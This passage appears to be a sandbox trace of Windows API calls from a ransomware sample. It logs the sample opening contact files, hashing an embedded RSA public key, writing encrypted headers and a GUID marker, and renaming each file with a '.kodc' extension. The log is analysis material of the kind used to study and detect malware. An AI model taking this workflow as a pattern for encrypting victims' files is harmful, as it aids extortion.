Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cece0 [0097.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.419] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.419] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.419] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.419] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.419] CloseHandle (hObject=0x5cc) returned 1 [0097.424] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.kodc")) returned 1 [0097.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.425] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.427] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0097.427] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned=".contact" [0097.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.428] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=1177) returned 1 [0097.428] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.432] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x473, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.432] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.433] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.433] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x499, lpOverlapped=0x0) returned 1 [0097.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d0958 [0097.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.434] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.435] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.435] CryptHashData (hHash=0x3331b88, pbData=0x32d0958, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.435] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32f7268 [0097.435] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x32f7268, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32f7268, pdwDataLen=0x9e2fa54) returned 1 [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7268 | out: hHeap=0x630000) returned 1 [0097.438] CryptDestroyHash (hHash=0x3331b88) returned 1 [0097.438] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.438] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.438] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.439] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4a0) returned 0x333b018 [0097.439] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d0958 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a298 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb58 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a598 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.439] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a598 | out: hHeap=0x630000) returned 1 [0097.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a598 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32f7208 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a520 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7268 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f71e8 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a598 | out: hHeap=0x630000) returned 1 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7208 | out: hHeap=0x630000) returned 1 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.440] GetCurrentThreadId () returned 0x42c [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6959a8 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316f78 [0097.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.441] GetCurrentThreadId () returned 0x42c [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33186b8 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecd0 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecf0 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a598 [0097.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x630000) returned 1 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7208 [0097.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecd0 | out: hHeap=0x630000) returned 1 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a580 [0097.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0097.443] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x499, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.443] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.443] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.443] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.443] CloseHandle (hObject=0x5cc) returned 1 [0097.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.444] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.kodc")) returned 1 [0097.446] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0097.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0097.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.447] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0097.447] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0097.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0097.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.447] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned=".contact" [0097.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.448] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=1174) returned 1 [0097.448] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.451] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x470, lpNewFilePointer=0x0, 